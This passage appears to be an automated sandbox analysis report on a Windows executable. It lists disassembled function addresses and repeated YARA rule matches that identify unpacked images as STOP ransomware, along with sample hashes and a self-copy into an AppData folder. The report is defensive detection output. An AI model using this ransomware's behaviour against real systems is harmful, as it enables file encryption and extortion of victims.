        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C3DBE00_2_00C3DBE0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C32B600_2_00C32B60
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C40B000_2_00C40B00
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C35DE70_2_00C35DE7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C35DF70_2_00C35DF7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C72D1E0_2_00C72D1E
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C64E9F0_2_00C64E9F
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00C38E600_2_00C38E60
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040D2402_2_0040D240
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00419F902_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040C0702_2_0040C070
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042E0032_2_0042E003
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004080302_2_00408030
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004101602_2_00410160
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004021C02_2_004021C0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0044237E2_2_0044237E
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004084C02_2_004084C0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004344FF2_2_004344FF
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0043E5A32_2_0043E5A3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040A6602_2_0040A660
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0041E6902_2_0041E690
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004067402_2_00406740
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004027502_2_00402750
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040A7102_2_0040A710
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004087802_2_00408780
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042C8042_2_0042C804
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004068802_2_00406880
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004349F32_2_004349F3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004069F32_2_004069F3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00402B802_2_00402B80
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00406B802_2_00406B80
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0044ACFF2_2_0044ACFF
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042CE512_2_0042CE51
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00434E0B2_2_00434E0B
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00406EE02_2_00406EE0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00420F302_2_00420F30
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004050572_2_00405057
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0042F0102_2_0042F010
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004070E02_2_004070E0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004391F62_2_004391F6
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004352402_2_00435240
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004C93432_2_004C9343
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004054472_2_00405447
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004054572_2_00405457
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004495062_2_00449506
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0044B5B12_2_0044B5B1
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004356752_2_00435675
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004096862_2_00409686
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040F7302_2_0040F730
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0044D7A12_2_0044D7A1
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_004819202_2_00481920
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0044D9DC2_2_0044D9DC
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00449A712_2_00449A71
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00443B402_2_00443B40
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00409CF92_2_00409CF9
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040DD402_2_0040DD40
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00427D6C2_2_00427D6C
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040BDC02_2_0040BDC0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00409DFA2_2_00409DFA
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00409F762_2_00409F76
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0046BFE02_2_0046BFE0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00449FE32_2_00449FE3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CC00D04_2_00CC00D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB70E04_2_00CB70E0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB30F04_2_00CB30F0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBB0B04_2_00CBB0B0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBB0004_2_00CBB000
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBA0264_2_00CBA026
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CCF0304_2_00CCF030
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CDD1A44_2_00CDD1A4
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CFE1414_2_00CFE141
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB91204_2_00CB9120
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00D322C04_2_00D322C0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB72204_2_00CB7220
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB73934_2_00CB7393
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CFE37C4_2_00CFE37C
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB35204_2_00CB3520
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB75204_2_00CB7520
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBE6E04_2_00CBE6E0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CFB69F4_2_00CFB69F
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBA6994_2_00CBA699
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CDD7F14_2_00CDD7F1
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBA79A4_2_00CBA79A
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBC7604_2_00CBC760
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CD18D04_2_00CD18D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB78804_2_00CB7880
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB89D04_2_00CB89D0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB59F74_2_00CB59F7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CDE9A34_2_00CDE9A3
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CDF9B04_2_00CDF9B0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBA9164_2_00CBA916
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB7A804_2_00CB7A80
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBCA104_2_00CBCA10
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CBDBE04_2_00CBDBE0
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB2B604_2_00CB2B60
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CC0B004_2_00CC0B00
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB5DE74_2_00CB5DE7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB5DF74_2_00CB5DF7
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CF2D1E4_2_00CF2D1E
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CE4E9F4_2_00CE4E9F
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 4_2_00CB8E604_2_00CB8E60
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C200D05_2_00C200D0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C170E05_2_00C170E0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C130F05_2_00C130F0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1B0B05_2_00C1B0B0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1B0005_2_00C1B000
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1A0265_2_00C1A026
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C2F0305_2_00C2F030
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C3D1A45_2_00C3D1A4
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C5E1415_2_00C5E141
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C191205_2_00C19120
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C922C05_2_00C922C0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C172205_2_00C17220
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C173935_2_00C17393
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C5E37C5_2_00C5E37C
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C135205_2_00C13520
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C175205_2_00C17520
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1E6E05_2_00C1E6E0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1A6995_2_00C1A699
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C5B69F5_2_00C5B69F
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C3D7F15_2_00C3D7F1
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1A79A5_2_00C1A79A
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1C7605_2_00C1C760
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C318D05_2_00C318D0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C178805_2_00C17880
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C189D05_2_00C189D0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C159F75_2_00C159F7
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C3E9A35_2_00C3E9A3
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C3F9B05_2_00C3F9B0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1A9165_2_00C1A916
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C17A805_2_00C17A80
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1CA105_2_00C1CA10
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C1DBE05_2_00C1DBE0
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C12B605_2_00C12B60
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C20B005_2_00C20B00
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C15DE75_2_00C15DE7
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C15DF75_2_00C15DF7
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C52D1E5_2_00C52D1E
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C44E9F5_2_00C44E9F
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: 5_2_00C18E605_2_00C18E60
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: String function: 00C38EC0 appears 57 times
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeCode function: String function: 00C40160 appears 50 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00428C81 appears 42 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00CE0160 appears 50 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00CD8EC0 appears 57 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 004547A0 appears 75 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 0042F7C0 appears 97 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 0044F23E appears 53 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00428520 appears 77 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00C60160 appears 50 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00454E50 appears 41 times
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: String function: 00C58EC0 appears 57 times
        Source: C0XWmZAnYk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 2.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 9.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 9.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 8.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 6.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 6.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 9.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 9.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 12.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 12.2.C0XWmZAnYk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 2.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 2.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
